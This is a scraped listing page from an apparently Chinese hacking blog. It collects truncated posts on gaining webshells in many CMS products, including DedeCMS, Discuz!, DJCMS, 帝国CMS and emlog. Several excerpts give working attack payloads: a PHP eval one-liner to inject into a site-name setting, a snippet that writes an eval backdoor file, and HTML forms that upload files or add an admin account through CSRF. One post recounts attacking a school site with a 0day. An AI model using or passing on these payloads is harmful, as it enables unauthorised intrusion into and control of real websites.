WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 关注cms

11月

26日

动易cms net版本拿shell热门置顶

动易cms net版本拿shell

大家都知道动易的.net版本基本网上没什么漏洞,基本我遇到动易.net版本的时候也是基本放弃(试完弱口令和旁站之后)这次遇到了个动易aspx的,人品爆发弱口令进去了然后开始拿shell一脸懵b啊,没遇到过啊,百度搜索也都是asp版本的拿shell, aspx无效啊,只能自己慢慢摸索了,在系统设置中看到了这个,, 可以自定义路径,我擦,这样的话我给他定义到一个存放着aspx文件的目录不就可以修改as...
作者:T.H.E   分类:关注cms   浏览(1345)   评论(0)   关键词: cms漏洞阅读全文

冠邦校园网平台(QHCMS)任意文件上传漏洞

1. 以“qhcmsadmin”为关键字,搜索使用冠邦校园网平台的网站。 2. 将以下代码保存为.html,手动POST一个.php文件: <form enctype="multipart/form-data" action="http://www.xxx.com/editor/fckeditor/filemanager/upload/php/upload.php" method="post"&...
作者:T.H.E   分类:关注cms   浏览(2280)   评论(0)   关键词: cms漏洞阅读全文

KESION CMS最新版任意文件上传WEBSHELL

科讯KESION CMS最新版任意文件上传WEBSHELL 最新版本上传漏洞哦会员上传文件漏洞,可以上传任意后缀 文件漏洞:user/swfupload.asp 文件代码: If UpFileObj.Form("NoReName")="1" Then '不更名 Dim PhysicalPath,FsoObj:Set FsoObj = KS.InitialObject(KS.Setti...
作者:T.H.E   分类:关注cms   浏览(1860)   评论(0)   关键词: cms漏洞阅读全文

dedecms v5.7 文件包含导致任意代码执行

影响版本: ≤V5.7SP1正式版(2014-06-27) 概述: 安全盒子团队在审计织梦dedecms时发现,某处过滤不严格,可任意代码执行,导致getshell 漏洞细节: 需要登录后台 在后台的随机模板设置 跟入article_template_rand.php 代码: //对旧文档进行随机模板处理 else if($...
作者:T.H.E   分类:关注cms   浏览(2322)   评论(0)   关键词: cms漏洞阅读全文

Discuz! X1.5前台getshell漏洞

这个漏洞很久了 网络上也有 我现在之所以发出来是因为 这次比较详细 第一步自己本地搭建php环境 第二步保存下面exp代码为php 代码: <?php print_r(' +---------------------------------------------------------------------------+ Discuz! X1-1.5 no...
作者:T.H.E   分类:关注cms   浏览(23741)   评论(0)   关键词: Discuz! X1.5前台getshell漏洞阅读全文

隐匿在Pastebin上的后门

快速分享文本、代码的网站Pastebin常常被黑客们用来分享自己的库、窃取的数据和其他代码,而现在它真的被用于黑客攻击了。 近日安全研究人员居然发现黑客们正在通过Gmail草稿、Evernote等平台控制僵尸网络。安全公司Sucuri最近发布的博文介绍了一种新玩法:黑客利用流行的WordPress插件RevSlider的老版本漏洞传播新的后门变种,使用Pastebin.com放置恶意软件。下面就让我们...
作者:T.H.E   分类:关注cms   浏览(1937)   评论(0)   关键词: 隐匿在Pastebin上的后门阅读全文

aspcmsCSRF漏洞利用代码

插播一个exp 本文章由:www.hackxiaoyi.com 提供   exp: <FORM name="form" action="https://www.webshell.ren/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" > ...
作者:T.H.E   分类:关注cms   浏览(2621)   评论(0)   关键词: aspcmsCSRF漏洞利用代码阅读全文

DJCMS 3.0后台拿shell

进入后台 在其它设置里  网站名称插入以下一句话 记住提交两次 shell代码: ");eval($_POST[cmd])?>   然后用菜刀连接 shell路径:https://www.webshell.ren/inc/config.php   by:xch40  
作者:T.H.E   分类:关注cms   浏览(2617)   评论(0)   阅读全文

帝国CMS 后台拿shell

版本是帝国CMS7.0 的后台 方法一: 系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型”如图: “导入系统模型”,可进入“LoadInM.php”页面,如图: 在本地新建一个文件,文本内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?&g...
作者:T.H.E   分类:关注cms   浏览(4250)   评论(0)   关键词: 帝国CMS阅读全文

wordpress上传漏洞分享

此文章转自网络 今天在被黑站点统计审核的时候发现有个2B提交了一批wordpress和joomla程序的站,我联系了黑页提交者 我问他有wordpress漏洞0day啊,他说有,我说分享来玩玩,他没回复我,我手里有个目标站是wordpress, 惆怅啊,难道要钱才给?过了几个小时,我再联系他的时候,他的签名既然改成了wp利用  代价   16点结束。赶紧啦。。 人...
作者:T.H.E   分类:关注cms   浏览(2245)   评论(2)   关键词: wordpress上传漏洞阅读全文

PHPMyWind绕过过滤SQL注入(限定条件)

需要register_globals=on。 /include/common.inc.php 注册变量的代码: foreach(array('_GET','_POST') as $_request) { foreach($$_request as $_k => $_v) { if(strlen($_k)>0 && preg_match('#^...
作者:T.H.E   分类:关注cms   浏览(1128)   评论(0)   关键词: cms漏洞集合阅读全文

12月

04日

校园系统cms漏洞热门

校园系统cms漏洞

今天日站发现了一个 0day 学校的 这是一个任意上传漏洞 不用后台权限 本地搭建上传 成功得到一个shell 这个系统还有编辑器上传不重命名的 可以利用iis6的解析漏洞 服务器是内网的 我没去进一步渗透 附上exp: <form action="https://www.webshell.ren/AjaxFileHandler...
作者:T.H.E   分类:关注cms   浏览(1608)   评论(2)   关键词: 校园系统cms漏洞阅读全文

12月

03日

emlog相册插件漏洞热门

emlog相册插件漏洞

这个漏洞出来了有一段时间了 官网已经把这个插件更新了   我也去测试了一下 发现这个没有更新 我就去测试了一下 用exp 去上传 成功了 得到了shell路径 content/plugins/kl_album/upload/201412/15035462388182087238dcab9458a63820...
作者:T.H.E   分类:关注cms   浏览(1835)   评论(4)   关键词: emlog相册插件漏洞阅读全文

天生创想CRM系统任意下载漏洞

首先我们看一下漏洞文件 /down.php 代码: <?php $filename=$_GET['urls']; header("Content-Type: application/force-download"); header("Content-Disposition: attachment; filename=".basename($filename)); readfile($filena...
作者:T.H.E   分类:关注cms   浏览(1154)   评论(0)   关键词: cms漏洞阅读全文

齐博cmsV7系统sql注入

漏洞文件:https://www.webshell.ren/down.php?v=v7 down.php 的代码如下 function Add_S($array){ foreach($array as $key=>$value){ if(!is_array($value)){ @eregi("['\\\"&]+",$key) && die('ERROR KEY!'); $v...
作者:T.H.E   分类:关注cms   浏览(1335)   评论(2)   关键词: cms漏洞阅读全文
  • 全球访问统计

      Free counters!
  • <-----------------------------------------------分界线----------------------------------------------->